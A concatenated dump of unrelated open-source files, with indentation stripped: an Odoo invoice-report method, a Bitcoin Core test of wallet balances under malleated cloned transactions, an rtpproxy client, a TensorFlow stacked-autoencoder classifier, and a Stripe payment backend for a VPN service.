def render_html(self, cr, uid, ids, data=None, context=None):
report_obj = self.pool['report']
posorder_obj = self.pool['pos.order']
report = report_obj._get_report_from_name(cr, uid, 'account.report_invoice')
selected_orders = posorder_obj.browse(cr, uid, ids, context=context)
ids_to_print = []
invoiced_posorders_ids = []
for order in selected_orders:
if order.invoice_id:
ids_to_print.append(order.invoice_id.id)
invoiced_posorders_ids.append(order.id)
not_invoiced_orders_ids = list(set(ids) - set(invoiced_posorders_ids))
if not_invoiced_orders_ids:
not_invoiced_posorders = posorder_obj.browse(cr, uid, not_invoiced_orders_ids, context=context)
not_invoiced_orders_names = list(map(lambda a: a.name, not_invoiced_posorders))
raise osv.except_osv(_('Error!'), _('No link to an invoice for %s.' % ', '.join(not_invoiced_orders_names)))
docargs = {
'doc_ids': ids_to_print,
'doc_model': report.model,
'docs': selected_orders,
}
return report_obj.render(cr, uid, ids, 'account.report_invoice', docargs, context=context)
| agpl-3.0 |
daliwangi/bitcoin | test/functional/txn_clone.py | 32 | 7658 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet accounts properly when there are cloned transactions with malleated scriptsigs."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class TxnMallTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 4
self.setup_clean_chain = False
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
super(TxnMallTest, self).setup_network()
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
def run_test(self):
# All nodes should start with 1,250 BTC:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_locktime = rawtx1["locktime"]
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs, clone_locktime)
# createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 BTC serialized is 00286bee00000000
pos0 = 2*(4+1+36+1+4+1)
hex40 = "00286bee00000000"
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 BTC for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
| mit |
jevonearth/rtpproxy | python/sippy_lite/sippy/Rtp_proxy_client.py | 2 | 10170 | # Copyright (c) 2003-2005 Maxim Sobolev. All rights reserved.
# Copyright (c) 2006-2014 Sippy Software, Inc. All rights reserved.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from Timeout import TimeoutInact
from Rtp_proxy_client_udp import Rtp_proxy_client_udp
from Rtp_proxy_client_stream import Rtp_proxy_client_stream
import socket
CAPSTABLE = {'20071218':'copy_supported', '20080403':'stat_supported', \
'20081224':'tnot_supported', '20090810':'sbind_supported', \
'20150617':'wdnt_supported'}
class Rtpp_caps_checker(object):
caps_requested = 0
caps_received = 0
rtpc = None
def __init__(self, rtpc):
self.rtpc = rtpc
rtpc.caps_done = False
for vers in CAPSTABLE.iterkeys():
self.caps_requested += 1
rtpc.send_command('VF %s' % vers, self.caps_query_done, vers)
def caps_query_done(self, result, vers):
self.caps_received += 1
vname = CAPSTABLE[vers]
if result == '1':
setattr(self.rtpc, vname, True)
else:
setattr(self.rtpc, vname, False)
if self.caps_received == self.caps_requested:
self.rtpc.caps_done = True
self.rtpc.go_online()
self.rtpc = None
class Rtp_proxy_client(Rtp_proxy_client_udp, Rtp_proxy_client_stream):
worker = None
address = None
online = False
copy_supported = False
stat_supported = False
tnot_supported = False
sbind_supported = False
wdnt_supported = False
shut_down = False
proxy_address = None
caps_done = False
sessions_created = None
active_sessions = None
active_streams = None
preceived = None
ptransmitted = None
hrtb_ival = 10.0
hrtb_retr_ival = 60.0
rtpp_class = None
def __init__(self, global_config, *address, **kwargs):
#print 'Rtp_proxy_client', address
no_version_check = False
if kwargs.has_key('no_version_check'):
no_version_check = kwargs['no_version_check']
del kwargs['no_version_check']
if len(address) == 0 and kwargs.has_key('spath'):
a = kwargs['spath']
del kwargs['spath']
if a.startswith('udp:'):
a = a.split(':', 2)
if len(a) == 2:
rtppa = (a[1], 22222)
else:
rtppa = (a[1], int(a[2]))
self.proxy_address = rtppa[0]
kwargs['family'] = socket.AF_INET
self.rtpp_class = Rtp_proxy_client_udp
elif a.startswith('udp6:'):
proto, a = a.split(':', 1)
if not a.endswith(']'):
a = a.rsplit(':', 1)
if len(a) == 1:
rtp_proxy_host, rtp_proxy_port = a[0], 22222
else:
rtp_proxy_host, rtp_proxy_port = (a[0], int(a[1]))
else:
rtp_proxy_host, rtp_proxy_port = a, 22222
if not rtp_proxy_host.startswith('['):
rtp_proxy_host = '[%s]' % rtp_proxy_host
rtppa = (rtp_proxy_host, rtp_proxy_port)
self.proxy_address = rtppa[0]
kwargs['family'] = socket.AF_INET6
self.rtpp_class = Rtp_proxy_client_udp
elif a.startswith('tcp:'):
a = a.split(':', 2)
if len(a) == 2:
rtppa = (a[1], 22222)
else:
rtppa = (a[1], int(a[2]))
self.proxy_address = rtppa[0]
kwargs['family'] = socket.AF_INET
self.rtpp_class = Rtp_proxy_client_stream
elif a.startswith('tcp6:'):
proto, a = a.split(':', 1)
if not a.endswith(']'):
a = a.rsplit(':', 1)
if len(a) == 1:
rtp_proxy_host, rtp_proxy_port = a[0], 22222
else:
rtp_proxy_host, rtp_proxy_port = (a[0], int(a[1]))
else:
rtp_proxy_host, rtp_proxy_port = a, 22222
if not rtp_proxy_host.startswith('['):
rtp_proxy_host = '[%s]' % rtp_proxy_host
rtppa = (rtp_proxy_host, rtp_proxy_port)
self.proxy_address = rtppa[0]
kwargs['family'] = socket.AF_INET6
self.rtpp_class = Rtp_proxy_client_stream
else:
if a.startswith('unix:'):
rtppa = a[5:]
elif a.startswith('cunix:'):
rtppa = a[6:]
else:
rtppa = a
self.proxy_address = global_config['_sip_address']
kwargs['family'] = socket.AF_UNIX
self.rtpp_class = Rtp_proxy_client_stream
self.rtpp_class.__init__(self, global_config, rtppa, **kwargs)
elif len(address) > 0 and type(address[0]) in (tuple, list):
self.rtpp_class = Rtp_proxy_client_udp
self.proxy_address = address[0][0]
Rtp_proxy_client_udp.__init__(self, global_config, *address, \
**kwargs)
else:
self.rtpp_class = Rtp_proxy_client_stream
self.proxy_address = global_config['_sip_address']
Rtp_proxy_client_stream.__init__(self, global_config, *address, \
**kwargs)
if not no_version_check:
self.version_check()
else:
self.caps_done = True
self.online = True
def send_command(self, *args, **kwargs):
self.rtpp_class.send_command(self, *args, **kwargs)
def reconnect(self, *args, **kwargs):
self.rtpp_class.reconnect(self, *args, **kwargs)
def version_check(self):
if self.shut_down:
return
self.send_command('V', self.version_check_reply)
def version_check_reply(self, version):
if self.shut_down:
return
if version == '20040107':
self.go_online()
elif self.online:
self.go_offline()
else:
to = TimeoutInact(self.version_check, self.hrtb_retr_ival)
to.spread_runs(0.1)
to.go()
def heartbeat(self):
#print 'heartbeat', self, self.address
if self.shut_down:
return
self.send_command('Ib', self.heartbeat_reply)
def heartbeat_reply(self, stats):
#print 'heartbeat_reply', self.address, stats, self.online
if self.shut_down:
return
if not self.online:
return
if stats == None:
self.active_sessions = None
self.go_offline()
else:
sessions_created = active_sessions = active_streams = preceived = ptransmitted = 0
for line in stats.splitlines():
line_parts = line.split(':', 1)
if line_parts[0] == 'sessions created':
sessions_created = int(line_parts[1])
elif line_parts[0] == 'active sessions':
active_sessions = int(line_parts[1])
elif line_parts[0] == 'active streams':
active_streams = int(line_parts[1])
elif line_parts[0] == 'packets received':
preceived = int(line_parts[1])
elif line_parts[0] == 'packets transmitted':
ptransmitted = int(line_parts[1])
self.update_active(active_sessions, sessions_created, active_streams, preceived, ptransmitted)
to = TimeoutInact(self.heartbeat, self.hrtb_ival)
to.spread_runs(0.1)
to.go()
def go_online(self):
if self.shut_down:
return
if not self.online:
if not self.caps_done:
rtpp_cc = Rtpp_caps_checker(self)
return
self.online = True
self.heartbeat()
def go_offline(self):
if self.shut_down:
return
#print 'go_offline', self.address, self.online
if self.online:
self.online = False
to = TimeoutInact(self.version_check, self.hrtb_retr_ival)
to.spread_runs(0.1)
to.go()
def update_active(self, active_sessions, sessions_created, active_streams, preceived, ptransmitted):
self.sessions_created = sessions_created
self.active_sessions = active_sessions
self.active_streams = active_streams
self.preceived = preceived
self.ptransmitted = ptransmitted
def shutdown(self):
if self.shut_down: # do not crash when shutdown() called twice
return
self.shut_down = True
self.rtpp_class.shutdown(self)
self.rtpp_class = None
def get_rtpc_delay(self):
return self.rtpp_class.get_rtpc_delay(self)
| bsd-2-clause |
TinghuiWang/pyActLearn | pyActLearn/learning/nn/sda.py | 1 | 15121 | import logging
import numpy as np
import tensorflow as tf
from .layers import AutoencoderLayer, HiddenLayer, SoftmaxLayer
from .injectors import BatchInjector
from .criterion import MonitorBased, ConstIterations
logger = logging.getLogger(__name__)
class SDA:
"""Stacked Auto-encoder
Args:
num_features (:obj:`int`): Number of features.
num_classes (:obj:`int`): Number of classes.
layers (:obj:`list` of :obj:`int`): Series of hidden auto-encoder layers.
encode_optimizer: Optimizer used for auto-encoding process.
tuning_optimizer: Optimizer used for fine tuning.
Attributes:
num_features (:obj:`int`): Number of features.
num_classes (:obj:`int`): Number of classes.
x (:obj:`tensorflow.placeholder`): Input placeholder.
y_ (:obj:`tensorflow.placeholder`): Output placeholder.
inner_layers (:obj:`list`): List of auto-encoder hidden layers.
"""
def __init__(self, num_features, num_classes, layers, encode_optimizer=None, tuning_optimizer=None):
self.num_features = num_features
self.num_classes = num_classes
with tf.name_scope('input'):
self.x = tf.placeholder(tf.float32, shape=[None, num_features], name='input_x')
self.y_ = tf.placeholder(tf.float32, shape=[None, num_classes], name='input_y')
self.inner_layers = []
self.summaries = []
self.encode_opts = []
if encode_optimizer is None:
self.encode_optimizer = tf.train.AdamOptimizer()
else:
self.encode_optimizer = encode_optimizer
if tuning_optimizer is None:
self.tuning_optimizer = tf.train.AdamOptimizer()
else:
self.tuning_optimizer = tuning_optimizer
# Create Layers
for i in range(len(layers)):
if i == 0:
# First Layer
self.inner_layers.append(
AutoencoderLayer(num_features, layers[i], x=self.x, name=('Hidden%d' % i))
)
else:
# inner Layer
self.inner_layers.append(
AutoencoderLayer(layers[i-1], layers[i], x=self.inner_layers[i-1].y, name=('Hidden%d' % i))
)
self.summaries += self.inner_layers[i].summaries
self.encode_opts.append(
self.encode_optimizer.minimize(self.inner_layers[i].encode_loss,
var_list=self.inner_layers[i].variables)
)
if num_classes == 1:
# Output Layers
self.output_layer = HiddenLayer(layers[len(layers) - 1], num_classes, x=self.inner_layers[len(layers)-1].y,
name='Output', activation_fn=tf.sigmoid)
# Predicted Probability
self.y = self.output_layer.y
self.y_class = tf.cast(tf.greater_equal(self.y, 0.5), tf.float32)
# Loss
self.loss = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(self.output_layer.logits, self.y_,
name='SigmoidCrossEntropyLoss')
)
self.correct_prediction = tf.equal(self.y_class, self.y_)
self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))
else:
# Output Layers
self.output_layer = SoftmaxLayer(layers[len(layers) - 1], num_classes, x=self.inner_layers[len(layers)-1].y,
name='OutputLayer')
# Predicted Probability
self.y = self.output_layer.y
self.y_class = tf.argmax(self.y, 1)
# Loss
self.loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(logits=self.output_layer.logits, labels=self.y_,
name='SoftmaxCrossEntropyLoss')
)
self.correct_prediction = tf.equal(self.y_class, tf.argmax(self.y_, 1))
self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))
self.summaries.append(tf.summary.scalar('cross_entropy', self.loss))
self.summaries.append(tf.summary.scalar('accuracy', self.accuracy))
self.summaries += self.output_layer.summaries
with tf.name_scope('train'):
self.fine_tuning = self.tuning_optimizer.minimize(self.loss)
self.merged = tf.summary.merge(self.summaries)
self.sess = None
def fit(self, x, y, batch_size=100,
pretrain_iter_num=100, pretrain_criterion='const_iterations',
tuning_iter_num=100, tuning_criterion='const_iterations',
summaries_dir=None, test_x=None, test_y=None, summary_interval=10,
session=None):
"""Fit the model to the dataset
Args:
x (:obj:`numpy.ndarray`): Input features of shape (num_samples, num_features).
y (:obj:`numpy.ndarray`): Corresponding Labels of shape (num_samples) for binary classification,
or (num_samples, num_classes) for multi-class classification.
batch_size (:obj:`int`): Batch size used in gradient descent.
pretrain_iter_num (:obj:`int`): Number of const iterations or search depth for monitor based stopping
criterion in pre-training stage
pretrain_criterion (:obj:`str`): Stopping criteria in pre-training stage ('const_iterations' or
'monitor_based')
tuning_iter_num (:obj:`int`): Number of const iterations or search depth for monitor based stopping
criterion in fine-tuning stage
tuning_criterion (:obj:`str`): Stopping criteria in fine-tuning stage ('const_iterations' or
'monitor_based')
summaries_dir (:obj:`str`): Path of the directory to store summaries and saved values.
summary_interval (:obj:`int`): The step interval to export variable summaries.
test_x (:obj:`numpy.ndarray`): Test feature array used for monitoring training progress.
test_y (:obj:`numpy.ndarray): Test label array used for monitoring training progress.
session (:obj:`tensorflow.Session`): Session to run training functions.
"""
if session is None:
if self.sess is None:
session = tf.Session()
self.sess = session
else:
session = self.sess
session.run(tf.global_variables_initializer())
# Pre-training stage: layer by layer
for j in range(len(self.inner_layers)):
current_layer = self.inner_layers[j]
if summaries_dir is not None:
layer_summaries_dir = '%s/pretrain_layer%d' % (summaries_dir, j)
train_writer = tf.summary.FileWriter(layer_summaries_dir + '/train')
test_writer = tf.summary.FileWriter(layer_summaries_dir + '/test')
valid_writer = tf.summary.FileWriter(layer_summaries_dir + '/valid')
# Get Stopping Criterion
if pretrain_criterion == 'const_iterations':
_pretrain_criterion = ConstIterations(num_iters=pretrain_iter_num)
train_x = x
train_y = y
elif pretrain_criterion == 'monitor_based':
num_samples = x.shape[0]
valid_set_len = int(1 / 5 * num_samples)
valid_x = x[num_samples - valid_set_len:num_samples, :]
valid_y = y[num_samples - valid_set_len:num_samples, :]
train_x = x[0:num_samples - valid_set_len, :]
train_y = y[0:num_samples - valid_set_len, :]
_pretrain_criterion = MonitorBased(n_steps=pretrain_iter_num,
monitor_fn=self.get_encode_loss,
monitor_fn_args=(current_layer, valid_x, valid_y),
save_fn=tf.train.Saver().save,
save_fn_args=(session, layer_summaries_dir + '/best.ckpt'))
else:
logger.error('Wrong criterion %s specified.' % pretrain_criterion)
return
injector = BatchInjector(data_x=train_x, data_y=train_y, batch_size=batch_size)
i = 0
while _pretrain_criterion.continue_learning():
batch_x, batch_y = injector.next_batch()
if summaries_dir is not None and (i % summary_interval == 0):
summary, loss = session.run(
[current_layer.merged, current_layer.encode_loss],
feed_dict={self.x: x, self.y_: y}
)
train_writer.add_summary(summary, i)
logger.info('Pre-training Layer %d, Step %d, training loss %g' % (j, i, loss))
if test_x is not None and test_y is not None:
summary, loss = session.run(
[current_layer.merged, current_layer.encode_loss],
feed_dict={self.x: test_x, self.y_: test_y}
)
test_writer.add_summary(summary, i)
logger.info('Pre-training Layer %d, Step %d, test loss %g' % (j, i, loss))
if pretrain_criterion == 'monitor_based':
summary, loss = session.run(
[current_layer.merged, current_layer.encode_loss],
feed_dict={self.x: valid_x, self.y_: valid_y}
)
valid_writer.add_summary(summary, i)
logger.info('Pre-training Layer %d, Step %d, valid loss %g' % (j, i, loss))
_ = session.run(self.encode_opts[j], feed_dict={self.x: batch_x, self.y_: batch_y})
i += 1
if pretrain_criterion == 'monitor_based':
tf.train.Saver().restore(session, layer_summaries_dir + '/best.ckpt')
if summaries_dir is not None:
train_writer.close()
test_writer.close()
valid_writer.close()
# Finish all internal layer-by-layer pre-training
# Start fine tuning
if summaries_dir is not None:
tuning_summaries_dir = '%s/fine_tuning' % summaries_dir
train_writer = tf.summary.FileWriter(tuning_summaries_dir + '/train')
test_writer = tf.summary.FileWriter(tuning_summaries_dir + '/test')
valid_writer = tf.summary.FileWriter(tuning_summaries_dir + '/valid')
# Setup Stopping Criterion
if tuning_criterion == 'const_iterations':
_tuning_criterion = ConstIterations(num_iters=pretrain_iter_num)
train_x = x
train_y = y
elif tuning_criterion == 'monitor_based':
num_samples = x.shape[0]
valid_set_len = int(1 / 5 * num_samples)
valid_x = x[num_samples - valid_set_len:num_samples, :]
valid_y = y[num_samples - valid_set_len:num_samples, :]
train_x = x[0:num_samples - valid_set_len, :]
train_y = y[0:num_samples - valid_set_len, :]
_tuning_criterion = MonitorBased(n_steps=pretrain_iter_num,
monitor_fn=self.predict_accuracy,
monitor_fn_args=(valid_x, valid_y),
save_fn=tf.train.Saver().save,
save_fn_args=(session, tuning_summaries_dir + '/best.ckpt'))
else:
logger.error('Wrong criterion %s specified.' % pretrain_criterion)
return
injector = BatchInjector(data_x=train_x, data_y=train_y, batch_size=batch_size)
i = 0
while _tuning_criterion.continue_learning():
batch_x, batch_y = injector.next_batch()
if summaries_dir is not None and (i % summary_interval == 0):
summary, loss, accuracy = session.run([self.merged, self.loss, self.accuracy],
feed_dict={self.x: train_x, self.y_: train_y})
train_writer.add_summary(summary, i)
logger.info('Fine-Tuning: Step %d, training accuracy %g, loss %g' % (i, accuracy, loss))
if (test_x is not None) and (test_y is not None):
merged, accuracy = session.run([self.merged, self.accuracy],
feed_dict={self.x: test_x, self.y_: test_y})
test_writer.add_summary(merged, i)
logger.info('Fine-Tuning: Step %d, test accuracy %g' % (i, accuracy))
if tuning_criterion == 'monitor_based':
merged, accuracy = session.run([self.merged, self.accuracy],
feed_dict={self.x: valid_x, self.y_: valid_y})
valid_writer.add_summary(merged, i)
logger.info('Fine-Tuning: Step %d, valid accuracy %g' % (i, accuracy))
_ = session.run(self.fine_tuning, feed_dict={self.x: batch_x, self.y_: batch_y})
i += 1
if tuning_criterion == 'monitor_based':
tf.train.Saver().restore(session, tuning_summaries_dir + '/best.ckpt')
if summaries_dir is not None:
train_writer.close()
test_writer.close()
valid_writer.close()
def get_encode_loss(self, layer, x, y, session=None):
"""Get encoder loss of layer specified
"""
if session is None:
if self.sess is None:
session = tf.Session()
self.sess = session
else:
session = self.sess
return session.run(layer.encode_loss, feed_dict={self.x: x, self.y_: y})
def predict_accuracy(self, x, y, session=None):
"""Get Accuracy given feature array and corresponding labels
"""
if session is None:
if self.sess is None:
session = tf.Session()
self.sess = session
else:
session = self.sess
return session.run(self.accuracy, feed_dict={self.x: x, self.y_: y})
def predict_proba(self, x, session=None):
"""Predict probability (Softmax)
"""
if session is None:
if self.sess is None:
session = tf.Session()
self.sess = session
else:
session = self.sess
return session.run(self.y, feed_dict={self.x: x})
def predict(self, x, session=None):
if session is None:
if self.sess is None:
session = tf.Session()
self.sess = session
else:
session = self.sess
return session.run(self.y_class, feed_dict={self.x: x})
| bsd-3-clause |
CCrypto/ccvpn3 | payments/backends/stripe.py | 1 | 7750 | import json
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from .base import BackendBase
class StripeBackend(BackendBase):
backend_id = 'stripe'
backend_verbose_name = _("Stripe")
backend_display_name = _("Credit Card")
backend_has_recurring = True
def get_plan_id(self, period):
return 'ccvpn_' + period
def __init__(self, settings):
if 'API_KEY' not in settings or 'PUBLIC_KEY' not in settings:
return
import stripe
self.stripe = stripe
stripe.api_key = settings['API_KEY']
self.pubkey = settings['PUBLIC_KEY']
self.header_image = settings.get('HEADER_IMAGE', '')
self.currency = settings.get('CURRENCY', 'EUR')
self.name = settings.get('NAME', 'VPN Payment')
self.backend_enabled = True
def new_payment(self, payment):
desc = str(payment.time) + ' for ' + payment.user.username
form = '''
<form action="{post}" method="POST">
<script
src="https://checkout.stripe.com/checkout.js" class="stripe-button"
data-key="{pubkey}"
data-image="{img}"
data-name="{name}"
data-currency="{curr}"
data-description="{desc}"
data-amount="{amount}"
data-email="{email}"
data-locale="auto"
data-zip-code="true"
data-alipay="true">
</script>
</form>
'''
return form.format(
post=reverse('payments:cb_stripe', args=(payment.id,)),
pubkey=self.pubkey,
img=self.header_image,
email=payment.user.email or '',
name=self.name,
desc=desc,
amount=payment.amount,
curr=self.currency,
)
def new_subscription(self, subscr):
desc = 'Subscription (' + str(subscr.period) + ') for ' + subscr.user.username
form = '''
<form action="{post}" method="POST">
<script
src="https://checkout.stripe.com/checkout.js" class="stripe-button"
data-key="{pubkey}"
data-image="{img}"
data-name="{name}"
data-currency="{curr}"
data-description="{desc}"
data-amount="{amount}"
data-email="{email}"
data-locale="auto"
data-zip-code="true"
data-alipay="true">
</script>
</form>
<noscript><p>Please enable JavaScript to use the payment form.</p></noscript>
'''
return form.format(
post=reverse('payments:cb_stripe_subscr', args=(subscr.id,)),
pubkey=self.pubkey,
img=self.header_image,
email=subscr.user.email or '',
name=self.name,
desc=desc,
amount=subscr.period_amount,
curr=self.currency,
)
def cancel_subscription(self, subscr):
if subscr.status not in ('new', 'unconfirmed', 'active'):
return
try:
cust = self.stripe.Customer.retrieve(subscr.backend_extid)
except self.stripe.error.InvalidRequestError:
return
try:
# Delete customer and cancel any active subscription
cust.delete()
except self.stripe.error.InvalidRequestError:
pass
subscr.status = 'cancelled'
subscr.save()
def callback(self, payment, request):
post_data = request.POST
token = post_data.get('stripeToken')
if not token:
payment.status = 'cancelled'
payment.status_message = _("No payment information was received.")
return
months = int(payment.time.days / 30)
username = payment.user.username
try:
charge = self.stripe.Charge.create(
amount=payment.amount,
currency=self.currency,
card=token,
description="%d months for %s" % (months, username),
)
payment.backend_extid = charge['id']
if charge['refunded'] or not charge['paid']:
payment.status = 'rejected'
payment.status_message = _("The payment has been refunded or rejected.")
payment.save()
return
payment.paid_amount = int(charge['amount'])
if payment.paid_amount < payment.amount:
payment.status = 'error'
payment.status_message = _("The paid amount is under the required amount.")
payment.save()
return
payment.status = 'confirmed'
payment.status_message = None
payment.save()
payment.user.vpnuser.add_paid_time(payment.time)
payment.user.vpnuser.on_payment_confirmed(payment)
payment.user.vpnuser.save()
except self.stripe.error.CardError as e:
payment.status = 'rejected'
payment.status_message = e.json_body['error']['message']
payment.save()
def callback_subscr(self, subscr, request):
post_data = request.POST
token = post_data.get('stripeToken')
if not token:
subscr.status = 'cancelled'
subscr.save()
return
try:
cust = self.stripe.Customer.create(
source=token,
plan=self.get_plan_id(subscr.period),
)
except self.stripe.error.InvalidRequestError:
return
except self.stripe.CardError as e:
subscr.status = 'error'
subscr.backend_data['stripe_error'] = e.json_body['error']['message']
return
# We don't know much about the new Payment, but we know it
# succeeded. Wekhooks aren't very reliable, so let's mark it as active
# anyway.
subscr.status = 'active'
subscr.backend_extid = cust['id']
subscr.save()
def webhook_payment_succeeded(self, event):
from payments.models import Subscription, Payment
invoice = event['data']['object']
customer_id = invoice['customer']
# Prevent making duplicate Payments if event is received twice
pc = Payment.objects.filter(backend_extid=invoice['id']).count()
if pc > 0:
return
subscr = Subscription.objects.get(backend_extid=customer_id)
payment = subscr.create_payment()
payment.status = 'confirmed'
payment.paid_amount = invoice['total']
payment.backend_extid = invoice['id']
payment.backend_data = {'event_id': event['id']}
payment.save()
payment.user.vpnuser.add_paid_time(payment.time)
payment.user.vpnuser.on_payment_confirmed(payment)
payment.user.vpnuser.save()
payment.save()
subscr.status = 'active'
subscr.save()
def webhook(self, request):
try:
event_json = json.loads(request.body.decode('utf-8'))
event = self.stripe.Event.retrieve(event_json["id"])
except (ValueError, self.stripe.error.InvalidRequestError):
return False
if event['type'] == 'invoice.payment_succeeded':
self.webhook_payment_succeeded(event)
return True
def get_ext_url(self, payment):
if not payment.backend_extid:
return None
return 'https://dashboard.stripe.com/payments/%s' % payment.backend_extid
